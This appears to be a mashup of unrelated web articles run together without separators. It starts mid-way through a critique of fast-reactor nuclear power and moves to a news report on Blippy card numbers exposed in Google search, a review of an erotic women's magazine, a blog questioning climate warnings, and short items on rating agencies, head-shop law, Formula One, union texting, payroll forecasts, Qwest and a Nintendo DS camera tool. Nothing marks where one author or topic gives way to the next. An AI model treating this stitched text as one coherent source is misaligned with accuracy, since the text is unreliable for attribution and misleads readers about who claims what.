This will require ending net human - induced CO2 emissions by 2050 .
How much CO2 can be emitted during this period , if the eventual concentration of 350 ppm is to be achieved ?
Other scientists have calculated the allowable “ carbon budget ” for the years until 2050 at a total of 420 gigatonnes ( billion tonnes ) of CO2 , with other greenhouse gases in proportion .
At present emission rates , this budget will be exhausted around 2021 .
How might third - and fourth - generation nuclear plants fit these requirements ?
Highly complex , and still unproven , third - generation plants would not be operating in significant numbers before 2020 , and probably for rather longer .
This is indicated by experience with the plant now being built at Olkiluoto in Finland .
Construction at the site is at least three and a half years behind schedule , and is plagued by cost overruns of some 60 per cent .
Compared to earlier installations , the projected fourth - generation plants – specifically , the “ integral fast reactor ” ( IFR ) designs that have drawn most attention – promise important advantages .
Passive safety features would make the chance of core meltdown ultra-remote .
Unlike most reactor designs , IFRs would use “ fast ” or high - energy neutrons , allowing them to create more fissile material – in this case , plutonium – than they consume .
This would be achieved through the irradiating of depleted uranium , of which large stockpiles exist .
Fresh mining of uranium would not be needed for hundreds of years .
Along with plutonium , the reactor products from IFRs would contain highly radioactive isotopes of minor transuranic elements .
The “ integral ” reactor complexes would include facilities for extracting the plutonium from the reactor products for use as fuel , with long half - life transuranics also removed and included in the fuel mix .
In this form , the fuel would be unsuitable for nuclear bomb - making without elaborate and easily detected reprocessing .
Its attractiveness as a basis for weapons proliferation would arguably be slight .
High - level wastes from other reactors could also be incorporated into the IFR fuel , to be “ burned ” and transmuted into relatively manageable materials .
The wastes left behind after the fuel extraction would initially be dangerous – and quite usable for dirty bombs – but within 200 years would be no more radioactive than natural uranium ores .
Energy bonanza ?
Through the use of IFRs , proponents like Hansen maintain , huge quantities of energy could be created without major emissions of greenhouse gases .
Meanwhile , the costs and dangers of uranium mining and enrichment would be avoided .
With plutonium and highly radioactive wastes never leaving the reactor sites , security would be easier to manage .
From being a massive obstacle , end - product waste storage would become quite feasible .
Unfortunately , IFRs do not offer a solution to global warming .
The catch , above all , is in the time lines .
There is simply no way that IFRs can be designed , brought to practical operating status and built in massive numbers during the few years – barely a decade , if something like today ’s natural world is to survive – that the greenhouse emissions budget allows us .
Developing workable IFRs would not be straightforward or quick , even if massive resources were assigned to the task .
Since the 1950s nuclear engineers have acquired considerable experience of fast - neutron reactors .
Mostly , this experience has been with so - called “ fast breeder ” reactors , designed to maximise plutonium output for bomb making and reactor fuel , rather than with “ burner ” reactors like IFRs .
But the message is the same for both types : fast - neutron reactors are particularly complex , have a high rate of accidents and breakdowns , and are fiendishly difficult and time consuming to service and repair .
Needing to maintain high neutron energy levels , fast reactors cannot use water as a coolant , since this would slow the neutrons down .
The coolant of choice is molten sodium metal .
Sodium is highly reactive , burning readily in air and exploding on contact with water .
If leaks are not to result in sodium - air fires , the reactor vessel and coolant pipes must be surrounded with inert argon gas , adding to complexity and costs .
At a certain point , the sodium coolant must be used for steam generation ; here , it is separated from high - pressure water by only a thin barrier of pipe metal , any flaw in which can have drastic consequences .
The sodium that passes through the reactor core becomes highly radioactive .
This means that an extra coolant loop must be incorporated , isolating the reactor coolant from the steam - generating equipment so that an explosion cannot disperse radioactive sodium ; again , the additional complexity raises capital costs .
For various repair and maintenance procedures , the sodium must be drained and the pipes flushed .
This has to be done with regard for the radioactivity , while taking care to prevent fires .
Even minor malfunctions can result in months of down time .
Sodium fires
Between 1980 and 1997 , Russia ’s BN - 600 fast reactor experienced 27 leaks , 14 of which resulted in sodium fires .
Japan ’s Monju reactor suffered a major sodium - air fire in 1995 , and was still out of action at the end of 2009 .
The only attempt so far at a commercial - scale fast reactor , the French Superphénix plant , was shut down after a decade in 1996 ; it had a lifetime capacity factor – that is , actual as compared to designed output – of just 7 per cent .
The development of IFRs , if it goes ahead , will be expensive , difficult and prolonged .
Wikipedia predicts a commercialisation date for fourth - generation nuclear plants of 2030 .
But we cannot wait that long before drastically curtailing greenhouse emissions .
With both third - and fourth - generation nuclear plants outside the time bracket , what is left for environmentalists who hanker after nuclear power ?
The only option for them is the one embraced by the French and Chinese governments , and now , it seems , by the Obama administration in the US : an accelerated roll - out of second - generation nuclear plants , built to standardised designs following rushed or non-existent consultation with the plants ’ future neighbours .
There are no guarantees , however , that major savings of carbon emissions would result .
The power - generating operations of nuclear plants emit virtually no greenhouse gases , but other parts of the nuclear cycle – uranium mining , milling and enrichment , and the construction of power plants – are fossil fuel - intensive .
Estimates of the all - up carbon footprints of today ’s nuclear plants are controversial , but whatever the actual emissions might be , they are considered certain to increase dramatically over time .
High - grade deposits of uranium are few , and likely to be quickly exhausted .
“ If nuclear energy were to be expanded to contribute ( say ) half of the world ’s electricity ” , researchers Mark Diesendorf and Peter Christoff calculated in 2006 , “ high - grade ( uranium ) reserves would last less than a decade ” .
Once these reserves are gone , second - and third - generation nuclear plants will depend for their fuel on low - grade ores some 10 - 20 times less concentrated than those which now grace the supply picture .
The cost in carbon emissions will mount accordingly .
The renewable alternative
The only responsible course for human society is to cut its greenhouse gas emissions through combining stringent energy economies with accelerated roll out of the renewable energy technologies which are available now .
These technologies are wind , solar , hydropower , biomass and conventional geothermal .
To them may be added several others that are at the demonstration - plant stage , and which concerted development could make fully practical within a few years .
In this category are wave and tidal power , and “ hot dry rock ” geothermal .
Hansen ’s argument that renewables can never meet humanity ’s demand for energy is contested by a growing list of studies .
His view would not carry weight with the group Beyond Zero Emissions , which in February began releasing a program for meeting all of Australia ’s stationary energy needs with renewables by 2020 .
Nor would it impress the Duke University researchers in the US who in March reported that 94 per cent of the electrical energy needs of their state of North Carolina could be met from in - state renewable sources .
Equally unmoved would be people from the organisation Desertec , which proposes using low - loss direct current electrical transmission to link solar thermal energy plants in supply grids tracking the sun across and between continents .
A renewably powered future requires a good deal of “ thinking outside the square ” , along with a willingness to radically re-order social and fiscal priorities .
But with renewables , the technologies required are mature , or quickly maturing .
The obstacles are not of the same order as those which confront IFR nuclear plants .
If governments and electricity authorities around the world nonetheless swallow the nuclear industry ’s lobbying , there is little chance of projections such as Desertec ’s ever being realised .
Typical prices cited for new nuclear plants in the US are in the region of US $ 3 - 5 billion each , and Stanford University ’s Mark Jacobson puts the number of plants required for nuclear to meet all the world ’s present electricity needs at 17,000 .
The opportunity costs of building even a fraction of these would surely smother any possibility of financing the parallel development of renewables .
In cases such as this , where spin threatens to outsell substance , influential scientists can play a big role in restoring rationality to government decision - making .
Or , if they fail to inform themselves properly before pronouncing on topics outside their core expertise , they can add substantially to the problems .
Hansen is a formidable climatologist , and there is no doubting his intellectual courage .
But on nuclear power , he is simply wrong .
It would be a tragedy if his errors on this topic were to undo much of his contribution to the fight against global warming .
[ Renfrey Clarke is a climate change activist and member of the Socialist Alliance in Adelaide , South Australia . ]
[ Update : Blippy cofounder Philip Kaplan emailed a response .
CNET
News is reporting that the cards in question were issued by Fifth Third , not Citibank . ]
[ Update # 2 : As of Saturday morning in California , Google told Blippy they ’ve removed all credit card numbers from Blippy in their index .
We found one more number just before the purge completed . ]
Yesterday was a big day for social - oversharing site Blippy , which lets members automatically post their purchases to the Internet .
The company announced $ 11.2 million in funding and was profiled in The New York Times .
Overnight , at least one Internet power user figured out a way to search for Blippy members ’ credit card numbers on Google .
A fairly obvious search for “ from card ” this morning returned 127 results that included full credit card numbers .
VentureBeat reporters deduced that all are Citibank - issued MasterCard numbers , though CNET News reported that the cards in question were issued by Fifth Third , a Midwestern bank .
We ’re reluctant to publish further details yet .
We ’ve contacted Citibank , Blippy CEO Ashvin Kumar and cofounder Philip Kaplan , and some of the people whose card numbers turned up .
Do sexy men and smart writing make for good reading ?
After spotting Filament magazine on my local newsstand - featuring the tagline " the thinking woman 's crumpet " - I unwrapped what I thought was a new ladymag and , well , rediscovered porn .
Advertisement
* Warning : Images Below NSFW
Before the launch of Filament , now in its fourth issue , the Independent conducted an interview with the editor .
Singh Singh quit her job to start Filament after leafing through thousands of magazine pages talking about makeup and diet tips , with little else :
" There are an awful lot of stereotypes about who women are and what turns them on , which I do n't think are true , " she says .
" If you 're not some walking stereotype of a woman – who really speaks to you ? "
Advertisement
Singh then set - out to create a space for women to be both mentally and sexually stimulated - which flies in the face of all conventional knowledge about what turns women on .
The FAQ section of the website - where Singh and crew directly confront naysayers - is full of hilarity .
How can you possibly use research to make porn ?!
I mean , it 's so clinical !
You probably wo n't like our mag .
It 's more for women who embrace new ways of thinking and think that using your brain is hot .
What does ' the thinking woman 's crumpet ' mean ?
A crumpet is a toasted bread snack popular in the UK and other commonwealth countries .
' Crumpet ' is also a quaint colloquialism for ' an attractive person ' .
British humourist Frank Muir coined the phrase ' the thinking man 's crumpet ' to refer to an intelligent and attractive woman .
Similarly ' the thinking woman's crumpet ' describes an attractive and intelligent man .
Surely popularising erotic images of men legitimises degrading images of women ?
‘ Erotic ' and ‘ degrading ' are polar opposites as far as we 're concerned .
It 's natural to be attracted to viewing the human form erotically , and there is nothing inherently degrading about the subject being less clothed or more aroused .
In conducting our research we 've been heartened by the kinds of things women are asking to see , namely more erotic imagery that depicts the subject as a person , not a sex object .
We 're proud of catering to such twisted fancies .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Singh , for her part , had me from hello - her editor 's letter , that is :
[ T ]he single most controversial thing about Filament is n't the cocks ; it 's that we have some content that is n't about sex .
Our critics have honed in on this fact obsessively , bleating that there 's nothing erotic about recipes or articles about population control .
Many marketers , publishers and distributors have looked at me with pity as if - oh , silly me ! -
I 'd slipped and accidentally dropped in an article about women and the games industry .
Plenty of men's magazines contain beautiful naked people and some articles that are n't sex related , but apply the same model to a women 's magazine and it becomes , in the words of one distributor , ' confusing . '
The people who decide what fills magazine racks are confused by the idea that women can be interested in perving on hot men as well as the big questions of society , like tolerance , or even little questions like , how do I bake a tea cake ?
The rest of us call this being human .
Advertisement
Indeed , why is it such a major revelation that women like to be visually stimulated ?
Though I often crack on Cosmo , one of the things I 've always appreciated is that the magazine acknowledges that women want to oogle scantily clad men every now and again .
And , according to current editor Kate White , the inclusion of more eye candy was a direct result of reader feedback .
So why are so many ladymags so slow to catch up to the trend ?
In addition to the professionally photographed guys who grace most of the pages , Filament has a " female gazing " section , where readers can submit pictures of the men in their life for other women 's appreciation .
Advertisement
Content - wise , the most issue is a real grab bag .
The first feature is dubbed " A Handy Guide to Japanese Rope Bondage " complete with a best practices guide and realistic looking models .
Advertisement
Following that , there 's a piece on pornography through the ages , where it ' revealed " we were making porn before we invented money , mathematics , or writing . "
Priorities !
An interview with artist , pornographer and " eco-sex " advocate Annie Sprinkle provides lots of interesting gems :
In 1981 , when I directed Deep Inside Annie Sprinkle , which has just been re-released , I had to stick to the formula because the guy putting up the money was the distributor : I had to have the six sex scenes , one anal scene , one lesbian scene , one orgy scene .
However , I still did the first female ejaculation scene in a film as far as anyone can ascertain , and I talked directly to the camera , which was pretty much unheard of .
I also got to try out a lot of my conceptual ideas ; for example , I did a scene where I go into an adult cinema and one of my films is playing on the screen , and I 'm having sex with people in the cinema , and of course then people are watching that in a cinema .
It became the second biggest grossing porn film in the US that year , which ultimately proved the distributors wrong .
But I was still mostly playing by their rules .
Advertisement
There 's a lot of porn I do n't necessarily like or identify with , but to me that 's okay .
Porn is a reflection of where people are at and what people like .
I 'd like to see more people in the art world experimenting with pornographic images .
I love art .
There are so many kinds of porn now , it 's better to call it pornographies : plural .
When I showed my cervix to 40,000 people on stage with Public cervix announcement , it was a loving gesture ; it was n't about shocking people or turning people on , it was really ' I love my body and I love you , and let 's take a look at where we come from ! '
It came from the heart .
I 've been part of the movement for sex worker rights since 1975 , and I really thought it would be decriminalized by now - it 's still illegal everywhere in the US except for parts of Nevada .
We can not be a sex positive society until we have compassion for those who want to pay for erotic pleasure and not stigmatise those that want to offer sex for money .
Advertisement
Other major articles follow : including one on pop culture depictions of mental illness , penned by a woman with borderline personality disorder ; a discussion on tolerance and cultural diversity opening with a Depeche Mode quote ; a guide to gardening for women who are " cursed with a black thumb ; " an interview with erotic photographer Cat O'Nine ; an article on encouraging more women to enter the gaming industry as both players and creators ; an illustrated guide to the art of the male - female - male threesome ; a colorfully ( read : teabagging visual gag ) illustrated recipe for teacake ; and three fiction pieces focusing on threesomes and fantasies .
The pictorials are varied , including one titled " By the Hour " depicting a for - pay transaction between a female client and a male sex worker .
Advertisement
Interestingly , the models are named , and the photographer / model Conrad shares his thoughts and motivations in framing the shoot .
This technique makes other appearances , including interviews with the " The Sound Guy " and " Drenched " models regarding their experiences and motivations .
Advertisement
Unfortunately , while Filament editors do incorporate a little diversity in their models , their crumpets are n't really my cup of tea .
The editorial taste skews toward guys who look like Alexander Skarsgård ( or really , the entire cast of True Blood , including the anonymous vamps . )
I 've only gotten one issue , and seen previews of the other three , but the variation in men of color is pretty lacking .
There are a few black guys in each issue ( in this one , paired with white female partners or solo ) , one guy who appeared to be of mixed heritage , and no men of South or East Asian decent .
Admittedly , Alexander Skarsgård is tasty , but really , do we want to deny ourselves all of this ?
Advertisement
Advertisement
In addition , most of the female models featured were white , with the exception of one who presented as Latina .
Advertisement
The magazine , while featuring the occasional guy on guy spread , is intended for heterosexual women .
The FAQ notes :
Will you be publishing spreads of women in future ?
We already publish spreads that include women with men - couple shots and the like - but it's very unlikely that we 'll be featuring erotic pictorials of solo women in future .
This is not because we do n't realise that women sometimes find looking at other women erotic , but because many of our readers simply want a break from the many erotic images of women that they see everywhere , all the time .
If you 're looking for erotic images of men and women in the same place , try our friends Shot with Desire or Catnip magazine .
Advertisement
Is Filament a strong contender for regular reading rotation ?
Absolutely .
The articles are well written , and the photography is gorgeous , even if the types of images depicted are outside of my usual type .
One downside :
It 's a little difficult to read in public .
Official Site [ Filament Magazine ]
Related : Can an ex-civil servant finally persuade women to buy erotica ?
[ Independent ]
Five Reasons I Love Cosmo [ Feministe ]
This week : Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Sunday TOP
Thursday , April 22 , 2010
It 's time to panic .
That 's the thrust of an article by J. Bradford DeLong , Professor of Economics at the University of California at Berkeley .
His article , " Hot Today , and Tomorrow , " , was in today 's LA Times , and while I can't find it on line , substantially the same thing is here .
I found that link on his rather confusing web page .
The major point is according to NASA ’s Goddard Institute for Space Studies , we have just experienced the hottest twelve - month period in at least a thousand years .
If global temperatures continue rising at the rate they have risen for the past generation , then the world of 2100 will be 2.3 degrees Celsius – that ’s 4.1 degrees Farenheit [ sic ] -- hotter than the world of the 1970s .
If global warming accelerates , however , as industrializing China , India and other countries pour more greenhouse gases into the atmosphere , and as Indonesia , Brazil , and others cut and burn their forests , the world in 2100 will be 5 Celsius -- 9 Farenheit -- degrees hotter than the world of the 1970s .
He goes on to list the horrors of such a world * , although it 's not clear to me what his sources are .
Perhaps he does n't need any , being a professor of economics at a major US university .
He also makes it clear that we probably wo n't find any technological remedies : the prudent thing to do is to form what amounts to a world government that will force us to use less carbon .
Oddly enough , this economist , who appears to be very familiar with the effects of climate change , has little to say about the economic effects of his carbon taxes and reduced energy production , although you'd think that as an economist he'd know a little about that .
In any event , if you 're saving up to send your kids to a major university , understand that this is what they 'll be learning , and if you live in California you 're paying taxes to pay Professor DeLong and his colleagues to spread the word .
I do have a question .
While I do n't know how NASA knows that we 've just had the warmest year since 1009 AD , it does seem reasonable to ask why it was so warm in 1009 AD when there were n't any automobiles , and how the Earth managed to get from 1009 AD to present without overheating , and what happened to bring about the cooling of the Little Ice Age .
I will say that DeLong seems to be sympathetic to nuclear power , but he does n't spend a lot of time talking about it ; at least a search of " Brad DeLong Nuclear " turns up several bits about nuclear weapons , but he does n't seem to have written much about power plants .
I hasten to add that the piece above is exactly on target .
One wonders why promoting nuclear power is n't part of his panic proposals ?
While we 're on the subject of what they 're teaching in our colleges , this morning 's LA Times has an article by CCNY Sociology Professor Frances Fox Piven entitled " Lamenting Acorn " which is exactly what the title says it is : a lamentation of the death of Acorn and the hope that it will be back , stronger , as the voice of the people .
( I can't find a link to it yet , but it hardly matters : it 's not particularly noteworthy . )
Perhaps Acorn can answer the question of how NASA Goddard knows that 2009 was the warmest year for a thousand years , and how we managed to avoid the warming trend that must have preceded the Year 1009 .
Or at least how NASA Goddard managed to compute the temperature of 2009 so that we can all see how that was done .
=== *
The horrors include tornados in Los Angeles , the California Central Valley turning into Death Valley , famines all through Asia , and general disaster .
================
One of the best parts of being me is that if I 'm wrong someone will tell me soon enough .
Subj : Congressional interest in rating agencies
It turns out not to be quite the case , that Congress has taken no interest .
I 'm too lazy to look it up , but I remember seeing video archives of hearings in which the SEC Chaircritter said her agency is in the process of writing the rating agencies out of SEC rules , and I think I remember Barney Frank saying he was going to write them out of the law .
Alas , I also remember hearing some testimony -- perhaps from a ratings - agency - critter ? -- about how it 's really hard to do much more than refrain from granting the agencies official recognition in law or regulation , because courts have ruled that their opinions fall under " free speech " .
A little Googling did yield these links :
http://www.house.gov/apps/list/press/
financialsvcs_dem/pressCRA_102809.shtml
http://www.house.gov/apps/list/hearing/
financialsvcs_dem/pressCM_093009.shtml
http://www.house.gov/apps/list/press/
financialsvcs_dem/press_120309.shtml thomas.loc.gov seems to indicate that the bill announced in the first link apparently stalled in the House after being reported out of committee .
The bill announced in the third link covers lots more topics besides rating agencies , and I can't tell whether the " credit rating agencies " the bill dealt with are the securities rating agencies or consumer - credit - rating agencies , or both .
thomas.loc.gov seems to indicate that it passed the House and is now before a Senate committee .
There 's also the Financial Crisis Inquiry Commission at fcic.gov .
I 've viewed archived videos of several of their hearings , and at least one Commissioner promised a witness that the rating agencies would be roasted in due course .
This link says they 've just subpoenaed Moody 's " for failing to comply with a request for documents in a timely manner " :
http://fcic.gov/news/pdfs/2010-0421-Advisory.pdf
Rod Montgomery==monty@starfief.com
So apparently there has been discussion , but I do n't see much of it .
I do know that Barney Frank got a 1000 + page House Bill on consumer protection through regulation passed , and Chris Dodd is working on a 1000 + page Senate version , and I was n't aware that either had anything to do with the ratings agencies .
There may be something in there -- in 1000 + pages that no one has read in its entirety , who knows what may be in there -- but there 's been little to nothing in the debates .
I would think myself that anything so complex that it takes 1000 pages and the creation of new agencies to solve would be done very carefully ; and that it 's obvious to me that the big crash came because the ratings agencies allowed pension funds and other such institutions to invest in crazy derivatives by giving those derivatives ratings of sound risk when at least one of the derivatives was created so that someone could bet against its success .
The crisis came when too big to fail organizations got involved , and most of them can't invest in stuff without ratings , or so I understand .
I do n't claim to be an expert on high finance , but it does seem to me that those who look to reform Wall Street by protecting investors and consumers might want to start with a reform of the ratings system .
People who want to invest in Blue Chips ought to have a reliable way to determine just what is a Blue Chip -- and the Blue Chip designation ought not be for sale .
We 're in an almighty hurry to reform Wall Street .
Perhaps we ought to slow it down until Moody 's gets around to compliance .
It 's not like there 's all that money out there just straining to get at strange derivatives .
Were I in charge , I 'd be looking at a different matter : how can we set up Wall Street so that it does n't matter to us whether a Big Bank fails ?
If there were 50 major banks instead of just the Big Seven ( or Big Five depending on who you read ) then the failure of one or two would n't be devastating to everyone , and we would n't need so much regulation .
The problem with Big Capitalism is that it tends to concentrate power .
This was Marx 's observation , and it 's true .
Adam Smith observed that capitalists tend to conspire to use government in their favor , and that has been going on forever .
Some big bubbles and crashes of the 19th Century were blamed on speculators , and Andy Jackson killed the Bank of the United States as one remedy .
An institution that is too big to fail is one that must either be prevented from taking certain risks -- i.e. to have regulators substitute their judgment for that of the institution 's controllers -- or be allowed to take crazy risks but then be bailed out when they go sour .
This is gambler 's heaven : I make the bet and keep the winnings , but you pay for my losses .
Honest ratings and institutions we can allow to take high risks and suffer the consequences of failure .
Those seem to me a better remedy than the competing 1000 + page Frank and Dodd bills .
Instead of 1000 pages of new law creating new agencies and new regulations , perhaps we ought to look into reforming the ratings agencies , and applying anti-trust law to breaking up institutions so they are not too big to fail .
At least we ought to be talking about that .
============
The public employees union bussed in thousands to Springfield Illinois to protest any adjustments to state employee pensions and wages .
Our Masters show their strength .
This will continue .
Rush Limbaugh gives us the image of a tick demanding that you feed the dog more ...
================
Not of general interest yet , but a glimpse of things to come .
Windows 7
PCs with multitouch screens now have a new series of apps focused on play .
http://news.cnet.com/8301-10805_3-
20003155-75.html?tag=nl.e70 3
And the beat goes on .
Hi Jerry ,
The article is available online now , and will be in the 4/26 print edition .
The article covers the courting -- or lack thereof - - of book publishers by Amazon , Apple and Google for their support in the e-book platform wars http://www.newyorker.com/reporting/
2010/04/26/100426fa_fact_auletta?currentPage=all
All the best , Jim Woodinville , WA If you are interested in the publishing business and have not read this you probably should read it .
=================
Thursday TOP Current Mail
Rep. Darryl Rouson , a former crackhead and current Democrat from Tampa Bay , has successfully headed his pet bill , which would make it virtually impossible for head shops to sell bongs and other paraphernalia , through the legislature , and it's headed to Governor Crist 's desk .
The bill says head shops would have to make 75 percent of their revenue from the sale of tobacco , and only 25 percent can come from drug paraphernalia ( even if it can be used for tobacco ) .
Giving the FDA 's new harsher limits on tobacco ( including the banning of clove cigarettes ) , this would be impossible and economically disastrous to most head shops .
Never mind the fact that bongs can be made out of anything from apples to soda cans and are available online , and that the bill probably would n't do much to curb drug use in the state .
Besides , we 're sure there 's someone out there who actually uses bongs and other smoking devices for tobacco .
Plus they make interesting and eye - catching flower vases ( no , we did n't learn that from Martha Stewart ) .
Surprisingly ( or not ) , most head shop owners have n't been the most active types , and only one spoke out against the bill at a House committee hearing .
Share this article on LinkedIn Email
Ferrari will evaluate an F - duct on its car in practice for the Chinese Grand Prix tomorrow , AUTOSPORT has learned , as teams clamber to close down the straightline advantage enjoyed by McLaren .
BMW Sauber is the only outfit that has so far been able to successfully copy the McLaren concept , which provides a straightline speed boost through the driver closing off a valve in the cockpit that helps stall the rear wing .
Although teams all set about working on their versions of the F - duct , the fact that the McLaren has been so quick in speed traps so far this year has brought some added urgency to teams getting it onto their machines .
Sources close to Ferrari have revealed that the team is making preparations to evaluate a duct on Fernando Alonso 's car during Friday 's free practice session in Shanghai .
It is not clear yet how the Ferrari system is incorporated onto the F10 , or if the concept is at an advanced enough stage to be raced in the Chinese Grand Prix .
Ferrari's decision comes after Felipe Massa admitted in the build - up to this weekend 's race that he was concerned about the advantage McLaren was enjoying from the F - duct .
" It 's a nice circuit to drive and the extremely long straight leading into a tight corner means there is a real possibility to overtake , " said Massa .
" However , we will need to be careful on that straight this year , because we have seen that the McLaren in particular has a very high top speed , so in case of a close battle with them we will have to be careful and ready to defend position . "
Team - mate Fernando Alonso said on Thursday that he would welcome the device .
" It will be an advantage , no doubt , " Alonso said .
" It is one of the longest straights in the championship and we know how efficient the McLaren is on the straights and what their top speed in the first races was .
" We saw McLaren very competitive in Malaysia , especially with Lewis [ Hamilton ] in the dry .
But I still think that Red Bull will have a little advantage over everybody again here . "
The Spaniard claimed , however , that the F - duct was not a top priority for his team .
" I know that we keep developing the car , but it 's not maybe the first priority for us , that system .
We keep working on our philosophies .
There is an important step here to improve the car , and I know that there is more coming in the next races .
I 'm not specifically worried only about that system . "
Other teams are also close to giving the green light to introducing the system - with Williams also possibly looking at evaluating a ' blown rear wing ' in Shanghai this weekend .
AUTOSPORT understands Mercedes may also run its own decide in Friday 's practice .
NEW YORK - From the dawn of capitalism , working people have had to battle constantly for better wages , working conditions and quality of life .
Usually the bosses own most of the communication tools to spin that battle in their favor .
But now , with the Internet and digital revolutions , workers have gained powerful new tools against their bosses .
And one example comes from SEIU Local 32 BJ , New York ’s building workers union , as they prepare for a potential strike .
Some may call it Labor 2.0 .
Union members are in a battle with the Realty Advisory Board to secure a fair contract .
The Realty Advisory Board represents the private building owners .
The cost of living in New York City has continued to rise , while workers ’ wages have been stagnant .
But the RAB has balked at wage increases , as well as improved health and pension benefits .
On April 2 , union members voted to give their negotiating committee the authority to call a strike - which would be the first since 1991 - if an agreement is n’t reached by April 20 .
But this time - honored and tested tool of battle is being supplemented by modern technology .
32 BJ members recently received an e-mail from their union ’s president , Mike Fishman , urging them to keep informed on late - breaking developments - by text message .
“ As we head into the most critical days of bargaining , ” Fishman wrote , “ make sure that we can contact you with urgent updates . ”
The message went on to say that workers should text “ 32 BJ ” to 787753 .
After doing so , workers would begin to receive updates as they occur , directly on their phone .
Worker - to - worker contact is still important and texting can help .
Fishman ’s note asked workers to “ make sure everyone in your building is signed up for texts so you all have up - to - the minute information . ”
The slightly more traditional e-mail campaign is also in use .
32 BJ , representing about 120,000 workers , including 30,000 in private city buildings , is asking its supporters to go to www.standwithbuildingworkers.org to sign a letter to the RAB demanding that the board negotiate in better faith .
Photo via www.seiu32bj.org.
Is there just a little trepidation in Jan Hatzius ' typing as he reconfirms his +275,000 Friday NFP Target ?
Downside Surprise Calls Private - Sector Hiring into Question
BOTTOM LINE : ADP report weaker than expected , showing a decline of 23 k in March and raising questions about whether private - sector hiring has truly begun .
KEY NUMBERS :
ADP report says private - sector payrolls - 23 k in Mar vs median forecast +40 k .
MAIN POINTS :
1 . The ADP report on private - sector payrolls falls in March , coming in substantially weaker than expected .
( The February number was revised down very slightly from - 20 k to - 24 k . )
Employment at all firm sizes fell in March , with small firms showing a slightly bigger decline ( - 12 k ) than medium ( - 4 k ) and large companies ( - 7 k ) .
Employment losses were concentrated in goods producing sectors ( - 51 k ) and manufacturing ( - 9 k ) , while employment in services rose ( +28 k ) .
2 . With little evidence of weather effects in the ADP report , the slightly negative figures reported for February and March call into question the growing presumption that private - sector firms have turned the corner from job shedding to net hiring .
Our forecast of +275 k for Friday 's report on nonfarm payrolls is based on this premise ( an underlying increase of 50 k , including non-Census government , plus another 100 k for a weather rebound and 125 k for temporary Census hires ) .
We have not changed this estimate but will keep it under review , as we always do , pending more information on hiring ( Conference Board and Monster ) , claims , and the ISM 's mfg employment index .
Look for a late Thursday NFP revision out of Goldman , as tends to happen in contentuous situations .
It was announced yesterday that Louisiana - based CenturyTel is buying Qwest , marking the second major takeover in ten years for the Denver telco .
I have some history with the US West iteration of the company , having worked there from 1997 until the ill - fated Qwest “ merger ” in Summer 2000 .
I was fortunate enough to be a part of USW ’s PR group , which remains the best large corporate communication division I have ever seen ( and in that role I got to do some interesting , groundbreaking work ) .
I ’ve continued to watch the company fairly closely through the years , especially as the unfortunate Nacchio affair unfolded ( and am proud of the repeated stompings we here at S&R have administered to that amoral cur along the way ) .
I have hoped for the best over at 1801 California for a number of reasons .
I have friends ( and at least one student ) there still , and also we ’re talking about a company that occupies an important place in the local economy .
So yesterday ’s announcement finds me a tad ambivalent .
On paper it seems like a move that will provide some stability for customers in the 14 - state region .
On the other , it seems unlikely that one or two folks I know are going to survive the inevitable downsizing .
Losing a major corporate headquarters will cost the region some money and jobs , for sure , and perhaps a measure of prestige ( if , in fact , Joe Nacchio did n’t destroy it all ) .
And so on – for more on the business details , have a look at the Denver Business Journal ’s coverage , linked above .
The main problem I have with the deal is ultimately the same problem I ’ve had with Qwest for most of a decade now .
Let ’s roll back , briefly , to 1999 and 2000 .
US
West , under CEO Solomon Trujillo ( a man who has gone on to encounter difficulties in other places around the globe since then ) was an odd , almost bizarre admixture of two things that we were told were mutually exclusive .
On the one hand it was an old - economy , slow - moving , entrenched dinosaur of a regulated legacy telecom .
POTS – “ plain old telephone service ” – encumbered with ( gasp ) a unionized employee base and no interest in joining the rest of the world in 20th Century , let alone the 21st .
Some of this was true – it depended on which business unit you happened to be dealing with at the time .
On the other hand , US West was among the most innovative companies in the entire information / communication sector .
For instance , it was n’t a small , entrepreneurial start - up that first went to market with DSL , it was US West .
At the time of the Qwest merger the company was planning to roll out an advanced VDSL offering in Phoenix ( with other markets to follow ) , and it was also building a solid mobile service around some creative features that let you integrate your cell and landline services in ways that nobody else was even thinking about yet .
Some days Trujillo was a bonehead ( like when he decided to spin off the company ’s cable unit ) and other days he was a fecking visionary .
Once the merger happened and Nacchio got his hands on the operation , though , things went rapidly to hell .
His criminal behavior ( and that of his henchmen ) notwithstanding , the brilliant young vibrant innovative next - generation vital entrepreneurial nothing - like - that - evil - old - US - West customer - focused company - of - the - future never quite materialized .
While I ’ve never been entirely clear on who clocked whom in what room with the candlestick , the mobile focus disappeared .
Qwest ’s mobile play was quickly reduced to rebranding and reselling Sprint Wireless , and more recently they ’ve dropped all branding pretense – today , if you get mobile through Qwest , you ’re getting Verizon , period .
If you ’d like to bundle your television service into the package , they ’ll send over a nice technician from Direct TV .
Hell , Qwest might as well be Radio Shack .
This , unfortunately , was all happening at a time when more and more people were going mobile - only .
I ’m one of those people ( I abandoned the landline in 2007 ) and if you ’re not one , as well , odds are you know people who are .
Which meant that someone had settled on a strategery that focused heavily on …the one thing that fewer and fewer customers wanted ?
This oversimplifies a bit , of course – truth is that Qwest has an excellent business data unit ( they may even be number one in the country on that front ) .
And business services are extremely important for a national telco .
But in today ’s telecom landscape , if you want to effectively compete in the consumer marketplace you need to be able to fulfill the following :
Mobile
TV ( digital , HD , cable , satellite , whatever )
Internet
Landline
Integration ( that is , you need to be able to bundle these services in ways that are cost - effective for the consumer and operationally efficient for yourself )
Which brings me back around to CenturyTel +
Qwest .
I ’ve been yarping for years that Q needed to get in bed with a mobile provider – either buy a national mobile footprint , merge with one , sell to one , something .
The most obvious dance partners seemed to be Sprint and T Mobile , although I realize that neither of those options would be without hurdles .
And for all I know , Qwest execs may have pursued those possibilities and could n’t work it out .
No idea .
But I ’m looking at the newly merged company and seeing the same gaping void where the 21st Century ought to be .
A quick glance of the CenturyLink Web site ( that ’s the CenturyTel consumer brand ) suggests that they ’re even further behind on the mobile question that Qwest – heck , they ’re not even pretending .
It ’s as though mobile does n’t exist .
If my fears are correct , the headline at the Denver Business Journal should have read something like “ Dinosaurs marry , ignore meteor hurtling toward Earth . ”
I ’d love to be wrong , but this looks like a business predicated on a rapidly eroding market , and I ’m not sure I see much reason for long - term optimism .
The folks at the HDR Labs have released the Open Camera Controller ( OCC ) , a system that uses an older Nintendo DS handheld to provide more options to photographers seeking to get the most out of their DSLR cameras .
Using the Nintendo DS to get just the right shot [ HDR Labs ]
